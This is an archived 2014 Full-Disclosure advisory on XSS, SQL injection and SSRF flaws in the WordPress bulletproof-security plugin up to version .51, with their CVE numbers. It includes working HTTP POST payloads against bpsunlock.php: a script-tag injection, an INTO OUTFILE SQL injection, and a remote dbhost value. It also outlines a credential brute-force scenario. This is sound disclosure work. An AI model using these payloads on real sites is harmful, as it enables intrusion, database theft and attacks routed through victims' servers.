lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPk8CmqvVrp3=BG1EPHRe_hfoLMP=22vKLBiOSxUCTZ8_=FFkg@mail.gmail.com> Date: Wed, 5 Nov 2014 12:30:29 +0100 From: Pietro Oliva <pietroliva@...il.com> To: bugtraq <bugtraq@...urityfocus.com>, fulldisclosure@...lists.org Subject: [FD] Wordpress bulletproof-security <=.51 multiple vulnerabilities Vulnerability title: Wordpress bulletproof-security <=.51 multiple vulnerabilities Author: Pietro Oliva CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749 Vendor: AITpro Product: bulletproof-security Affected version: bulletproof-security <= .51 Vulnerabilities fixed in version: .51.1 Details: xss vulnerability (CVE-2014-7958): POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account SQL injection vulnerability (CVE-2014-7959, correct db username and password is required in order to exploit this): POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account SSRF vulnerability (CVE-2014-8749) POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1 dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account Possible scenario: - the user sends a request with username, password, host and other parameters to the vulnerable page - the server doesn't check the host parameter to be in a whitelist of permitted databases - the server performs an authentication request to a remote or internal network database and gives back to the attacker the authentication result -After n attemps the attacker has bypassed access restrictions (if any) to the remote database, discovered the remote database password, and made it appear bulletproof-security as the source of the attack. Extra step: -If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker could also execute arbitrary sql statement on the remote server, as the vulnerable page executes a query if the authentication is successful (without filtering or use prepared statements). The source of the attack would appear to be the bulletproof-security vulnerable site. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists